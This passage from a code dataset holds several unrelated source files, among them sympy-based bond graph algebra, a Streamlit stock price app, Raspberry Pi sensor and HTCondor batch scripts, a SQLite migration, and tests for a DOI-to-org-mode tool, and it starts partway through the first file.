ss_size:]\n\n row = state_constraint.row_join(sp.SparseMatrix(1, offset + cv_size, {}))\n\n cv_dict = {}\n if not control_constraint.is_zero:\n logging.info(\"Found higher order control constraint\")\n for cv_col in range(control_constraint.cols):\n const = control_constraint[cv_col]\n if not const:\n continue\n\n try:\n idx = added_cvs.index(cv_col)\n except ValueError:\n idx = len(added_cvs)\n added_cvs.append(cv_col)\n linear_op= linear_op.row_join(sp.SparseMatrix(linear_op.rows, 1, {}))\n coord = coordinates[offset + ss_size + cv_col]\n d_coord = sp.Symbol(f\"d{str(coord)}\")\n coordinates.append(d_coord)\n cv_size += 1\n n += 1\n\n cv_dict[(0,idx)] = const\n\n row = row.row_join(sp.SparseMatrix(1, len(added_cvs), cv_dict))\n jac_dx = [nonlinear_constraint.diff(c) for c in coordinates[:ss_size]]\n jac_junciton = [\n nonlinear_constraint.diff(c)\n for c in coordinates[ss_size:offset]\n ]\n jac_x = [\n nonlinear_constraint.diff(c)\n for c in coordinates[offset:\n offset+ss_size]\n ]\n jac_cv = [\n nonlinear_constraint.diff(c)\n for c in coordinates[offset + ss_size:]\n ]\n\n nlin_row = sp.S(0)\n\n if any(x!=0 for x in jac_dx):\n logger.warning(\"Second order constriants not implemented: %s\",\n jac_dx)\n elif any(x!=0 for x in jac_junciton):\n logger.warning(\"First order junciton constriants not implemented: %s\",\n jac_cv)\n elif any(x!=0 for x in jac_cv):\n logger.warning(\"First order control constriants not implemented: %s\",\n jac_cv)\n elif any(x!=0 for x in jac_x):\n logger.info(\"First order constriants: %s\", jac_x)\n fx = sum(x*y for x,y in zip(jac_x, coordinates[:ss_size]))\n logger.info(repr(fx))\n p, q = sp.fraction(sp.simplify(fx))\n if row.is_zero:\n lin_dict, nlin = extract_coefficients(\n p, {c:i for i,c in enumerate(coordinates)},\n coordinates)\n\n for k, v in lin_dict.items():\n row[0, k] += v\n\n nlin_row += nlin\n\n else:\n nlin_row += fx\n\n nonlinear_op = nonlinear_op.col_join(sp.SparseMatrix(1,1,[nlin_row]))\n\n linear_op = linear_op.col_join(row)\n rows_added += 1\n\n if rows_added:\n linear_op, nonlinear_op, constraints = \\\n smith_normal_form(linear_op, nonlinear_op)\n\n return coordinates, linear_op, nonlinear_op, constraints\n\n\ndef flatten(sequence):\n for item in sequence:\n if isinstance(item, (list, tuple)):\n for subitem in flatten(item):\n yield subitem\n else:\n yield item\n\n\ndef augmented_rref(matrix, augment=0):\n\n pivot = 0\n m = matrix.cols - augment\n for col in range(m):\n if matrix[pivot, col] == 0:\n j = None\n v_max = 0\n for row in range(pivot, matrix.rows):\n val = matrix[row, col]\n v = abs(val)\n if v > v_max:\n j = row\n v_max = v\n if not j:\n continue # all zeros below, skip on to next column\n else:\n matrix.row_swap(pivot, j)\n\n a = matrix[pivot, col]\n\n for i in range(matrix.rows):\n if i != pivot and matrix[i, col] != 0:\n b = matrix[i, col]/a\n matrix[i, :] += - b * matrix[pivot, :]\n\n matrix[pivot, :] *= 1 / a\n\n pivot += 1\n\n if pivot >= matrix.rows:\n break\n return matrix\n\n\ndef smith_normal_form(matrix, augment=None):\n \"\"\"\n Assume n >= m\n Args:\n matrix:\n augment:\n\n Returns:\n n x n smith normal form of the matrix.\n Particularly for projection onto the nullspace of M and the orthogonal\n complement\n that is, for a matrix M,\n P = _smith_normal_form(M) is a projection operator onto the nullspace of M\n \"\"\"\n # M, _ = matrix.rref()\n # m, n = M.shape\n # M = sp.SparseMatrix(m, n, M)\n # m_dict = {}\n # current_row = 0\n #\n # row_map = {}\n #\n # current_row = 0\n #\n # for row, c_idx, entry in M.RL:\n # if row not in row_map:\n # row_map[row] = c_idx\n # r_idx = c_idx\n #\n # else:\n # r_idx = row_map[row]\n #\n # m_dict[(r_idx, c_idx)] = entry\n #\n # return sp.SparseMatrix(n, n, m_dict)\n\n if augment:\n M = matrix.row_join(augment)\n k = augment.cols\n else:\n M = matrix\n k = 0\n m, n = M.shape\n M = augmented_rref(M, k)\n\n Mp = sp.MutableSparseMatrix(n-k, n, {})\n\n constraints = []\n for row in range(m):\n leading_coeff = -1\n for col in range(row, n-k):\n if M[row, col] != 0:\n leading_coeff = col\n break\n if leading_coeff < 0:\n if not M[row, n-k:].is_zero:\n constraints.append(sum(M[row,:]))\n else:\n Mp[leading_coeff, :] = M[row, :]\n\n if augment:\n return Mp[:,:-k], Mp[:, -k:], constraints\n else:\n return Mp, sp.SparseMatrix(m,k,{}), constraints\n\n\ndef adjacency_to_dict(nodes, edges, offset=0):\n \"\"\"\n matrix has 2*#bonds rows\n and 2*#ports columes\n so that MX = 0 and X^T = (e_1,f_1,e_2,f_2)\n\n Args:\n index_map: the mapping between (component, port) pair and index\n\n Returns: Matrix M\n\n \"\"\"\n M = dict()\n\n for i, (node_1, node_2) in enumerate(edges):\n j_1 = offset + 2 * nodes[node_1]\n j_2 = offset + 2 * nodes[node_2]\n # effort variables\n M[(2 * i, j_1)] = - 1\n M[(2 * i, j_2)] = 1\n # flow variables\n M[(2 * i + 1, j_1 + 1)] = 1\n M[(2 * i + 1, j_2 + 1)] = 1\n\n return M\n\n\ndef inverse_coord_maps(tangent_space, port_space, control_space):\n inverse_tm = {\n coord_id: index for index, coord_id\n in enumerate(tangent_space.values())\n }\n inverse_js = {\n coord_id: index for index, coord_id\n in enumerate(port_space.values())\n }\n inverse_cm = {\n coord_id: index for index, coord_id\n in enumerate(control_space.values())\n }\n\n coordinates = [dx for _, dx in tangent_space]\n\n for e, f in port_space:\n coordinates += [e, f]\n for x, _ in tangent_space:\n coordinates.append(x)\n for u in control_space:\n coordinates.append(u)\n\n return (inverse_tm, inverse_js, inverse_cm), coordinates\n","sub_path":"BondGraphTools/algebra.py","file_name":"algebra.py","file_ext":"py","file_size_in_byte":19312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450621920","text":"import yfinance as yf\r\nimport streamlit as st\r\n\r\nfrom yahoo_fin import stock_info\r\n\r\n\r\n\r\n\r\nst.sidebar.header(\"User input bar\")\r\n\r\ntickerSymbol = st.sidebar.selectbox(\r\n \"Which Ticker would you like to see?\",\r\n stock_info.tickers_sp500())\r\n\r\n\r\nst.write(\r\n \"# Simple Stock Price App\\n\"\r\n f\"Shown are the stock closing price and volume of {tickerSymbol}\"\r\n )\r\n\r\n# https://towardsdatascience.com/how-to-get-stock-data-using-python-c0de1df17e75\r\n#get data on this ticker\r\ntickerData = yf.Ticker(tickerSymbol)\r\n#get the historical prices for this ticker\r\ntickerDf = tickerData.history(period='1d', start='2010-5-31', end='2020-5-31')\r\n# Open\tHigh\tLow\tClose\tVolume\tDividends\tStock Splits\r\n\r\nst.write(\"\"\"\r\n## Closing Price\r\n\"\"\")\r\n\r\nst.line_chart(tickerDf.Close)\r\n\r\nst.write(\"\"\"\r\n## Closing Volume\r\n\"\"\")\r\nst.line_chart(tickerDf.Volume)\r\n","sub_path":"sl1.py","file_name":"sl1.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"32796234","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : Yeph Jia\n\n\nclass Welcome:\n\n def __init__(self):\n print(\"Hello, Commander.\\n\")\n\n\nif __name__ == '__main__':\n welcome = Welcome()\n while True:\n cmd = input(\"waiting for your command...\\n\")\n\n\n","sub_path":"welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"19192755","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nSENSOR_PIR_PIN = 23\nGPIO.setup(SENSOR_PIR_PIN, GPIO.IN)\n\ndef callback_func(output):\n if output == 1:\n print('Motion Detected!!')\n # else output == 0:\n # print(\"Motion Not Detected!!\")\n\ntry:\n print(\"PIR Module Test (CTRL+C to exit)\")\n time.sleep(2)\n print(\"Ready\")\n while True:\n time.sleep(5)\n output = GPIO.input(SENSOR_PIR_PIN)\n callback_func(output)\nexcept KeyboardInterrupt:\n print(\"Quit\")\n GPIO.cleanup()","sub_path":"Motion_Detection_HC_SR501_PIR_Sensor.py","file_name":"Motion_Detection_HC_SR501_PIR_Sensor.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"271842483","text":"#!/bin/python\n\nimport subprocess\n\nMagDownJob =627\nMagUpJob = 628\nMagDownSJN=1638\nMagUpSJN=517\n\nJobs={ 627: 1638,\n 628: 517\n }\n\ncondor_script=open('condor_submission.sub','w')\ncondor_script.write(\n'Executable = /home/tw/Analysis2/buketap/EPFLDataProcessing/brun.sh \\nError = logs/run$(process).err \\nOutput = logs/run$(process).out \\nLog = logs/run$(process).log \\nshould_transfer_files = YES \\nwhen_to_transfer_output = ON_EXIT \\n')\n\n\nfor job,Nsjs in Jobs.iteritems():\n for i in range(0,Nsjs):\n condor_script.write('arguments = {j} {sj}\\n'.format(j=job,sj=i))\n condor_script.write('Queue \\n')\ncondor_script.close()\n\nsubprocess.call('condor_submit condor_submission.sub',shell=True)\n","sub_path":"buketap/EPFLDataProcessing/SubmitToBatch.py","file_name":"SubmitToBatch.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"188906168","text":"import sqlite3\nfrom openpyxl import load_workbook\n\ndef migrate_data():\n wb = load_workbook(\"player data.xlsx\")\n\n migrate_endings(wb)\n migrate_annie(wb)\n migrate_global(wb)\n\n print('Data migrated to SQLite!')\n\n\ndef migrate_endings(wb):\n endings_data = wb['Endings']\n\n conn = sqlite3.connect('cya_db.db')\n cursor = conn.cursor()\n\n endings_index_map = {'Joining the Garrison':0, 'An Ordinary Moment of Happiness':1, 'Jean Kirstein of the Survey Corps':2, 'A Narrow Victory':3, 'Armin Arlert\\'s Dream':4,\n 'Captain Levi\\'s Recruit':5, 'Mikasa\\'s True Face':6, 'Nameless Hero':7, 'Eren Yeager\\'s Hand':8, 'Sasha Blouse\\'s Promise':9, 'The Girl Who Hid Her True Self':10,\n 'No Regrets':11, 'Jean of the Military Police':12, 'Trial of Eren and Mikasa':13, 'A Soldier\\'s Duty':14, 'Failure of the Reclamation Plan':15, 'A Regular Soldier':16,\n '104th Annihilated at HQ':17, 'The Fall of Wall Rose':18, 'Failure to Reclaim Trost District':19, 'A Moment\\'s Peace':20, 'Eren Flees':21, 'The Death of a Merchant':22,\n 'Junior High':23}\n\n endings_db_map = {'Joining the Garrison':'joining_the_garrison', 'An Ordinary Moment of Happiness':'an_ordinary_moment_of_happiness', \n 'Jean Kirstein of the Survey Corps':'jean_kirstein_of_the_survey_corps', 'A Narrow Victory':'a_narrow_victory', 'Armin Arlert\\'s Dream':'armin_arlerts_dream',\n 'Captain Levi\\'s Recruit':'captain_levis_recruit', 'Mikasa\\'s True Face':'mikasas_true_face', 'Nameless Hero':'nameless_hero', 'Eren Yeager\\'s Hand':'eren_yeagers_hand', \n 'Sasha Blouse\\'s Promise':'sasha_blouses_promise', 'The Girl Who Hid Her True Self':'the_girl_who_hid_her_true_self', 'No Regrets':'no_regrets', \n 'Jean of the Military Police':'jean_of_the_military_police', 'Trial of Eren and Mikasa':'trial_of_eren_and_mikasa', 'A Soldier\\'s Duty':'a_soldiers_duty', \n 'Failure of the Reclamation Plan':'failure_of_the_reclamation_plan', 'A Regular Soldier':'a_regular_soldier','104th Annihilated at HQ':'annihilated_at_hq', \n 'The Fall of Wall Rose':'the_fall_of_wall_rose', 'Failure to Reclaim Trost District':'failure_to_reclaim_trost_district', 'A Moment\\'s Peace':'a_moments_peace', \n 'Eren Flees':'eren_flees', 'The Death of a Merchant':'the_death_of_a_merchant','Junior High':'junior_high'}\n\n i = 0\n for _ in endings_data:\n i += 1\n\n row_values = [\n endings_data['A' + str(i)].value,\n endings_data['B' + str(i)].value,\n ]\n check_row = 'SELECT * FROM endings WHERE player = ?'\n cursor.execute(check_row, (row_values[0],))\n data = cursor.fetchone()\n\n if data is None:\n insert_row = 'INSERT INTO endings VALUES ({})'.format(','.join('?' * 25))\n insert_position = endings_index_map[row_values[1]]\n insert_data = [row_values[0]] + [0] * insert_position + [1] + [0] * (25 - 2 - insert_position)\n cursor.execute(insert_row, insert_data)\n else:\n update_row = 'UPDATE endings SET {} = ? WHERE player = ?'.format(endings_db_map[row_values[1]])\n ending_index = 1 + endings_index_map[row_values[1]]\n update_data = [data[ending_index] + 1, data[0]]\n cursor.execute(update_row, update_data)\n \n conn.commit()\n conn.close()\n\ndef migrate_annie(wb):\n annie_data = wb['Annie progress']\n\n conn = sqlite3.connect('cya_db.db')\n cursor = conn.cursor()\n\n annie_map = {'two':1, 'three':2, 'four':3, 'five':4, 'victory':5}\n\n i = 0\n for _ in annie_data:\n i += 1\n\n row_values = [\n annie_data['A' + str(i)].value,\n annie_data['B' + str(i)].value,\n ]\n check_row = 'SELECT * FROM annie_progress WHERE player = ?'\n cursor.execute(check_row, (row_values[0],))\n data = cursor.fetchone()\n\n if data is None:\n insert_row = 'INSERT INTO annie_progress VALUES (?,?)'\n insert_data = [row_values[0], annie_map[row_values[1]]]\n cursor.execute(insert_row, insert_data)\n else:\n update_row = 'UPDATE annie_progress SET progress = ? WHERE player = ?'\n highest_progress = max(data[1], annie_map[row_values[1]])\n update_data = [highest_progress, data[0]]\n cursor.execute(update_row, update_data)\n\n conn.commit()\n conn.close()\n\ndef migrate_global(wb):\n global_data = wb['Global']\n\n conn = sqlite3.connect('cya_db.db')\n cursor = conn.cursor()\n\n i = 0\n for _ in global_data:\n i += 1\n\n row_values = [\n global_data['A' + str(i)].value,\n global_data['B' + str(i)].value,\n ]\n\n insert_row = 'INSERT INTO global VALUES (?,?)'\n insert_data = [row_values[0], row_values[1]]\n cursor.execute(insert_row, insert_data)\n\n conn.commit()\n conn.close()\n\nmigrate_data()","sub_path":"Archive/ChooseYourAdventure/migrate_cya.py","file_name":"migrate_cya.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"237429765","text":"from __future__ import absolute_import\nfrom functools import wraps\nfrom symtensor.sym import (array, einsum, zeros, get_full_shape, \\\n zeros_like, diag, tensor, __all__)\nfrom . import random\nimport numpy\n\n__all__.extend([\"random\", \"fromfunction\", \"frombatchfunc\"])\ndef backend_wrapper(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n kwargs['backend'] = 'numpy'\n return func(*args, **kwargs)\n return wrapper\n\nzeros = backend_wrapper(zeros)\ndiag = backend_wrapper(diag)\narray = backend_wrapper(array)\ntensor = backend_wrapper(tensor)\n\ndef fromfunction(func, shape, **kwargs):\n sym = kwargs.pop('sym', None)\n dtype = kwargs.get('dtype', float)\n out = zeros(shape, sym)\n nsym = out.nsym\n if out.nsym==0:\n out.array = numpy.fromfunction(func, shape, **kwargs)\n else:\n kwargs.pop('dtype', None)\n sym_shape = list(out.array.shape[:nsym-1])\n ntasks = numpy.prod(sym_shape)\n trunk_size = numpy.prod(shape)\n for i in range(ntasks):\n idx = numpy.unravel_index(i, sym_shape)\n trunk_data = func(*idx, **kwargs)\n trunk_idx = i * trunk_size + numpy.arange(trunk_size)\n out.put(trunk_idx, trunk_data.ravel())\n return out\n\ndef frombatchfunc(func, shape, all_tasks, **kwargs):\n nout = kwargs.pop(\"nout\", 1)\n sym = kwargs.pop(\"sym\", None)\n dtype = kwargs.pop(\"dtype\", float)\n if isinstance(shape[0], list) or isinstance(shape[0], tuple):\n shape_list = shape\n else:\n shape_list = [shape,] * nout\n\n if sym is None:\n sym_list = [sym,]*nout\n elif isinstance(sym[0], str):\n sym_list = [sym,]*nout\n else:\n sym_list = sym\n\n out = kwargs.pop('out', None)\n\n if out is None:\n if nout==1:\n out = zeros(shape, sym, dtype=dtype)\n else:\n out = [zeros(shape_list[i], sym_list[i], dtype=dtype) for i in range(nout)]\n else:\n if isinstance(out, (list, tuple)):\n nout = len(out)\n else:\n nout = 1\n\n for itask in all_tasks:\n\n if isinstance(itask, (tuple, list)):\n inds, vals = func(*itask, **kwargs)\n else:\n inds, vals = func(itask, **kwargs)\n \n if nout ==1:\n out.put(inds.ravel(), vals.ravel())\n else:\n for i in range(nout):\n out[i].put(inds[i].ravel(), vals[i].ravel())\n inds = vals = None\n\n return out\n","sub_path":"symtensor/numpy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"292318188","text":"#! /usr/bin/env python3\n\nimport unittest\nimport random\nimport functools\nimport os\nimport sys\nimport yaml\nimport filecmp\nimport shutil\nfrom subprocess import Popen, PIPE\nfrom doi_to_org import *\n\nclass Util(unittest.TestCase):\n def run_prog(self, *args):\n cmd = ['./doi_to_org.py', *args]\n process = Popen(cmd, stdout=PIPE, stderr=PIPE)\n output = process.communicate()\n if process.wait() != 0:\n sys.stderr.write('with command: %s\\nstdout: %s\\nstderr: %s\\n' % (' '.join(args), output[0].decode('utf8'), output[1].decode('utf8')))\n self.assertTrue(False)\n with open(self.orgfile) as f:\n return f.read()\n\n def create_config(self):\n self.orgfile = os.path.join(os.getcwd(), 'foo.org')\n with open(self.orgfile, 'w') as f:\n f.write('')\n with open(CONFIG_FILE, 'w') as f:\n yaml.dump({CONFIG_ORGFILE_KEY : self.orgfile}, f)\n\n def tearDown(self):\n os.remove(CONFIG_FILE)\n os.remove(self.orgfile)\n\n def setUp(self):\n self.maxDiff = None\n self.create_config()\n\n def generic_test(self, arg, expected_output_file):\n with open(expected_output_file) as f:\n expected_output = f.read().strip()\n output = self.run_prog(arg).strip()\n self.assertEqual(output, expected_output)\n\nclass BibEntryTest(unittest.TestCase):\n def test_basic(self):\n with open('test_data/casanova_input.bib') as f:\n bibtex = f.read()\n bib_list = BibEntry.from_bibtex(bibtex)\n self.assertEqual(len(bib_list), 1)\n bib = bib_list[0]\n self.assertEqual(bib.doi, '10.1016/j.jpdc.2014.06.008')\n self.assertEqual(bib.url, 'https://hal.inria.fr/hal-01017319')\n self.assertEqual(bib.pdf, 'https://hal.inria.fr/hal-01017319/file/simgrid3-journal.pdf')\n self.assertEqual(bib.title, 'Versatile, Scalable, and Accurate Simulation of Distributed Applications and Platforms')\n import warnings\n with warnings.catch_warnings(): # calling the method plaintext() from pybtex causes a depreciation warning, but the proposed altednative does not work\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n self.assertEqual(bib.authors, 'Henri Casanova, Arnaud Giersch, Arnaud Legrand, Martin Quinson, Frédéric Suter')\n\n def test_missing_author(self):\n with open('test_data/casanova_missing_author_input.bib') as f:\n bibtex = f.read()\n\n bib_list = BibEntry.from_bibtex(bibtex)\n org_entry = OrgEntry(\"\", bib_list[0], attachment = True)\n\n with self.assertRaises(SystemExit):\n org_entry.orgmode_from_bibentry()\n\nclass BasicCommandLineTest(Util):\n def test_doi(self):\n self.generic_test('10.1137/0206024', 'test_data/knuth_output.org')\n\n def test_bibtex(self):\n self.generic_test('test_data/knuth_input.bib', 'test_data/knuth_output.org')\n\n def test_fixpoint(self):\n first_output = self.run_prog('test_data/knuth_input.bib')\n splitted = first_output.split('\\n')\n bibtex = []\n in_src = False\n for line in splitted:\n if in_src:\n if line.startswith('#+END_SRC'):\n break\n else:\n bibtex.append(line)\n else:\n if line.startswith('#+BEGIN_SRC'):\n in_src = True\n bibtex = '\\n'.join(bibtex)\n with open('/tmp/test_doi.bib', 'w') as f:\n f.write(bibtex)\n with open(self.orgfile, 'w') as f: # clearing the file...\n f.write('')\n second_output = self.run_prog('/tmp/test_doi.bib')\n self.assertEqual(first_output, second_output)\n\nclass ConfigTest(unittest.TestCase):\n def setUp(self):\n self.orgfile = os.path.join(os.getcwd(), 'foo.org')\n with open(self.orgfile, 'w') as f:\n f.write('hello world!')\n\n def tearDown(self):\n os.remove(CONFIG_FILE)\n os.remove(self.orgfile)\n\n def test_find_file(self):\n with self.assertRaises(FileNotFoundError):\n find_config_file()\n with open(CONFIG_FILE, 'w') as f:\n f.write('hello: world\\n')\n expected = os.path.join(os.getcwd(), CONFIG_FILE)\n self.assertEqual(expected, find_config_file())\n\n def create_config_file(self, config):\n with open(CONFIG_FILE, 'w') as f:\n yaml.dump(config, f)\n\n def test_get_correct_config(self):\n config = {CONFIG_ORGFILE_KEY: self.orgfile}\n self.create_config_file(config)\n real_config = get_config()\n self.assertEqual(config, real_config)\n\n def test_get_config_wrongfile(self):\n config = {CONFIG_ORGFILE_KEY: self.orgfile + 'some_other_str'}\n self.create_config_file(config)\n with self.assertRaises(ConfigError):\n get_config()\n\n def test_get_config_wrongkey(self):\n config = {'foo' : self.orgfile}\n self.create_config_file(config)\n with self.assertRaises(ConfigError):\n get_config()\n\nclass AttachmentTest(Util):\n def tearDown(self):\n shutil.rmtree('data')\n if os.path.isfile(self.orgfile):\n os.remove(self.orgfile)\n\n def generic_test(self, args, file_hash, file_name, expected_output_file):\n with open(expected_output_file) as f:\n expected_output = f.read().strip()\n output = self.run_prog('%s' % (','.join(args))).strip()\n self.assertEqual(output, expected_output)\n file_path = os.path.join('data', file_hash[:2], file_hash[2:], file_name)\n self.assertTrue(os.path.isfile(file_path))\n self.assertEqual(Attachment.crypto_hash(file_path), file_hash)\n\n def test_basic_attachment(self): # attaching knuth_input.bib\n self.generic_test(args=['test_data/knuth_input.bib', 'test_data/knuth_input.bib'],\n file_hash = '37f3616032c0bd00516ce65ff1c0c01ed25f99e5573731d660a4b38539b02346bcf794024c8d4c21e0bed97f50a309c40172ba342870e1526b370a03c55dbf49',\n file_name = 'Fast_Pattern_Matching_in_Strings.txt',\n expected_output_file='test_data/knuth_output_attachment.org')\n\n def test_url(self):\n self.generic_test(args=['https://hal.inria.fr/hal-01017319v2/bibtex'],\n file_hash = '095c324c84cc92722b52a2e87b63c638d052ea30397646bc4462ee84bca46412c574f89d636d1841d54eae2df7d33a545e97e204ed0147a84c1d89b7deb8081e',\n file_name = 'Versatile,_Scalable,_and_Accurate_Simulation_of_Distributed_Applications_and_Platforms.pdf',\n expected_output_file = 'test_data/casanova_output.org')\n\n def test_hal(self):\n self.generic_test(args=['hal-01017319v2'],\n file_hash = '095c324c84cc92722b52a2e87b63c638d052ea30397646bc4462ee84bca46412c574f89d636d1841d54eae2df7d33a545e97e204ed0147a84c1d89b7deb8081e',\n file_name = 'Versatile,_Scalable,_and_Accurate_Simulation_of_Distributed_Applications_and_Platforms.pdf',\n expected_output_file = 'test_data/casanova_output.org')\n\n def test_pdfpath(self):\n with open('test_data/casanova_local_pdf_input.bib') as f:\n bibtex = f.read()\n\n pdfpath = 'test_data/pdf'\n orgfile = os.path.join(os.getcwd(), 'bar.org')\n\n bib_list = BibEntry.from_bibtex(bibtex)\n org_entry = OrgEntry(orgfile, bib_list[0], Attachment.from_key(pdfpath, bib_list[0].key))\n\n org_entry.add_entry()\n self.assertTrue(os.path.isfile(\"./data/2a\" +\n \"/b880f480c6e2ef27a84f8e0fd36252ff444f970fe9dec88da2f77c744b85bd\" +\n \"e4b5cfcf5fdea3286298945facd819af9a07e594f4850410ce7e909ac9c31e84/\" +\n \"Versatile,_Scalable,_and_Accurate_Simulation_of_Distributed_\" +\n \"Applications_and_Platforms.pdf\"))\n\n os.remove(orgfile)\n\n def test_missing_file_pdfpath(self):\n with open('test_data/knuth_input.bib') as f:\n bibtex = f.read()\n\n os.mkdir('data')\n\n pdfpath = 'test_data'\n orgfile = os.path.join(os.getcwd(), 'bar.org')\n\n bib_list = BibEntry.from_bibtex(bibtex)\n\n with self.assertRaises(FileNotFoundError):\n attachment = Attachment.from_key(pdfpath, bib_list[0].key)\n\n org_entry = OrgEntry(orgfile, bib_list[0], attachment)\n org_entry.add_entry()\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"587130911","text":"import os\nhome=os.environ.get('HOME')\nrootdir=Dir('#').abspath\nImport('debug ARGUMENTS')\nenv = Environment( AR = 'i686-elf-ar',\n\t\t\t\t\tARFLAGS = 'rcs',\n\t\t\t\t\tCC = 'i686-elf-gcc --sysroot='+rootdir+'/sysroot -isystem=/usr/include',\n\t\t\t\t\tCFLAGS = '-std=gnu11 '+('-gdwarf-2 ' if debug else '-O2 ')+'-Wall -Wextra',\n\t\t\t\t\tCPPDEFINES = '__is_myos_libc',\n\t\t\t\t\tCPPPATH = 'include',\n\t\t\t\t\tLINKFLAGS = '-T linker.ld -nostdlib',\n\t\t\t\t\tLIBS = '-lk -lgcc')\n\nif ARGUMENTS.get('VERBOSE') != '1':\n env['CCCOMSTR'] = \"CC $TARGET\"\n env['LINKCOMSTR'] = \"LD $TARGET\"\n env['ARCOMSTR'] = \"AR $TARGET\"\n env['ASPPCOMSTR'] = \"AS $TARGET\"\n env['RANLIBCOMSTR'] = \"RL $TARGET\"\n\nenv.PrependENVPath('PATH', home+'/opt/cross/bin')\n\nenvk=env.Clone( CFLAGS = '-std=gnu11 -O2 -g -ffreestanding -fbuiltin',\n\t\t\t\tCPPDEFINES = '__is_myos_kernel',\n\t\t\t\tCPPPATH = '')\n\nARCHDIR=\"arch/i386\"\n\nenv.Object(\"stdio/printf.c\" )\nenv.Object(\"stdio/putchar.c\" )\nenv.Object(\"stdio/puts.c\" )\nenv.Object(\"stdlib/abort.c\" )\nenv.Object(\"stdlib/itoa.c\" )\nenv.Object(\"string/memcmp.c\" )\nenv.Object(\"string/memcpy.c\" )\nenv.Object(\"string/memmove.c\")\nenv.Object(\"string/memset.c\" )\nenv.Object(\"string/strlen.c\" )\n\nenv.Library(\"libc.a\",[\"stdio/printf.o\", \"stdio/putchar.o\", \"stdio/puts.o\", \"stdlib/abort.o\", \"stdlib/itoa.o\", \"string/memcmp.o\", \"string/memcpy.o\", \"string/memmove.o\", \"string/memset.o\", \"string/strlen.o\"])\n\nenvk.Object(\"stdio/printf.libk.o\" , \"stdio/printf.c\" )\nenvk.Object(\"stdio/putchar.libk.o\" , \"stdio/putchar.c\" )\nenvk.Object(\"stdio/puts.libk.o\" , \"stdio/puts.c\" )\nenvk.Object(\"stdlib/abort.libk.o\" , \"stdlib/abort.c\" )\nenvk.Object(\"stdlib/itoa.libk.o\" , \"stdlib/itoa.c\" )\nenvk.Object(\"string/memcmp.libk.o\" , \"string/memcmp.c\" )\nenvk.Object(\"string/memcpy.libk.o\" , \"string/memcpy.c\" )\nenvk.Object(\"string/memmove.libk.o\", \"string/memmove.c\")\nenvk.Object(\"string/memset.libk.o\" , \"string/memset.c\" )\nenvk.Object(\"string/strlen.libk.o\" , \"string/strlen.c\" )\n\nenvk.Library(\"libk.a\",[\"stdio/printf.libk.o\", \"stdio/putchar.libk.o\", \"stdio/puts.libk.o\", \"stdlib/abort.libk.o\", \"stdlib/itoa.libk.o\", \"string/memcmp.libk.o\", \"string/memcpy.libk.o\", \"string/memmove.libk.o\", \"string/memset.libk.o\", \"string/strlen.libk.o\"])\n","sub_path":"libc/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"528532468","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:GXR\nimport re\nimport requests\n\n# response_index = requests.get(url=\"http://huaban.com/\")\n# srcs_index = re.findall('\"key\":\"(.*?)\"', response_index.text, re.S)[:5]\n# for src in srcs_index:\n# url = 'http://img.hb.aicdn.com/' + src + '_sq320'\n# img = requests.get(url=url)\n# with open(url[-13:] + '.jpg', 'wb+') as f:\n# f.write(img.content)\n\nresponse_fl = requests.get(url=\"http://huaban.com/favorite/food_drink/\")\ntypename = re.findall('\"food_drink\", \"name\":\"(.*?)\"', response_fl.text, re.S)[0]\nprint(typename)\nsrcs_fl = re.findall('\"key\":\"(.*?)\"', response_fl.text, re.S)[:5]\nfor src in srcs_fl:\n url = 'http://img.hb.aicdn.com/' + src\n img = requests.get(url=url)\n with open(url[-13:] + '.jpg', 'wb+') as f:\n f.write(img.content)\nnames = re.findall('\"username\":\"(.*?)\"', response_fl.text, re.S)[:5]\nprint(names)\n","sub_path":"day09/case01_huaban.py","file_name":"case01_huaban.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
